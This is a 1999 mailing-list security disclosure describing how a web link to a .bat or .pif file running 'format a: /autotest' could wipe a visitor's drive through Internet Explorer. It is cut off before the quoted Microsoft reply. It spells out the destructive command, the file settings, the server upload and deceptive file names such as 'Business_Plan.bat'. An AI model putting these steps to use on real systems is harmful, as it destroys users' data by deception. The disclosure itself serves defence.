IE5 Automated format of HD, no ActiveX required

From: Charles D. O'Dale (codaleat_private)
Date: Tue Sep 21 1999 - 19:34:02 PDT

    Hi all,

    Back in July, I discovered a simple way in which a user's hard drive may
    be unexpectedly formatted via the World Wide Web using the Internet
    Explorer web browser -- no ActiveX required.  Microsoft was contacted
    many times via Secureat_private but would not acknowledge the
    difficulty as a problem (part of the e-mail exchange is re-printed
    below).  As it has been over two months since this potential nightmare
    was pointed out to them, and as no solution has been forthcoming, I'm
    hoping that you folks might be able to come up with a simple client-side
    answer to this problem before some vandal discovers it and decides to
    implement it on a large scale.

    To summarize:

    This attack involves uploading a .bat or .pif file (for the Format
    command) and linking it via html to a standard web page.  Once this link
    is clicked and the user agrees to 'Open' the file presented, a process
    will be started -- without prompting from the user -- to format the
    user's hard drive.

    The key is the Format command's "/autotest" flag, which I believe was
    put into place early on in MS-DOS's history to assist in batch
    processing, and was probably dropped from the documentation some time
    back (it's not in my DOS 5.0 manual as far as I can tell -- although
    that's not too far in the past).  It can be tested for by entering:
    "Format a: /autotest" at the MS-DOS C:\ prompt.

    The automated format via web page can be accomplished as follows (with
    the example shown demonstrating how to create a link on a web page which
    will automatically format Drive A):

    1)   Either:

             Create a .pif file ("Format.pif") with the Command Line set to:

                   "C:\WINDOWS\COMMAND\FORMAT.COM a: /autotest"

            And Working Line set to:

                 "C:\WINDOWS\COMMAND"

            Or:

              Create a .bat file ("Format.bat") with a single command:

                 "format a: /autotest"

            (Should the user wish to format another disk, the a: may be
    replaced with c:, d:, e:, etc.)

    2)  Link to the file on a web page as follows:

           Or:

         According to the method chosen for implementation in step 1.  These
    links may be placed beneath graphics or text, as would be found on a
    regular web page.

    3)  Upload the html document and .pif or .bat file to the targetted web
    server directory and wait for an unwary user to click the link and
    'Open'.

    Spooky, eh?

    These steps don't create a Trojan Horse so much as an out-right "Cyber
    Mine" which will be activated on a user's machine the instant they click
    the link and accept the file into their system.  As the download of the
    < 1k file is almost instantaneous, damage will be made to the user's
    data in a matter of seconds.

    The nasty kicker to this particular operation is the "/autotest" flag,
    which automatically activates the command preceeding it (in this case,
    the malicious Format) without requiring an acknowledgement from the
    user.  Although the user will be prompted to either 'Save' or 'Open' the
    file before any damage can be done, it is easy to see how a trusted web
    site, compromised by a malicious cracker and mined in the manner
    described above, could deliver this damaging bomb:

    -----

    Reading a trusted web page, the unwary user would click the mined link
    and accept the file into their system.  Given a suitable name, such as
    'Business_Plan.bat' or 'Secure.pif', it's reasonable to expect an
    average user to choose 'Open' when reading this file, as they would
    normally be provided with an option to save or discard the document at a
    later time and so have it held -- relatively harmlessly -- in memory.
    However, with the mined link, an automated format would be started
    instead.

    -----

    Unfortunately, given the frequency with which web pages are vandalized
    these days, it's not unreasonable to expect a malicious link of this
    nature being installed on a high-traffic web site at some point in the
    future.  Should a few hours pass before the incident is discovered (if
    the vandal leaves the page cosmetically intact, the 'cyber mined' .pif
    or .bat files (being only 1 k in size) would remain well hidden), a
    great deal of damage could be done to the systems of visiting users
    without them quite understanding how or why the damage occurred.

    There may be other attacks through this hole made possible by linking to
    different C:\Windows\Command files and I believe it may also be
    activated through various e-mail applications which permit html encoding
    -- making for one nasty Melissa-type e-mail!

    Of course, the user DOES have to choose 'Open' to activate the script,
    so this isn't necessarily operating outside of the expected bounds of
    operation for the Internet Explorer web browser.  However, given the
    unforgiving consequences a user would face for unexpectedly 'Opening'
    one of these malicious files off of a trusted web page or from one's
    e-mail, the "/autotest" flag might prove to be a feature which deserves
    early retirement.

    Now, for Secureat_private's response: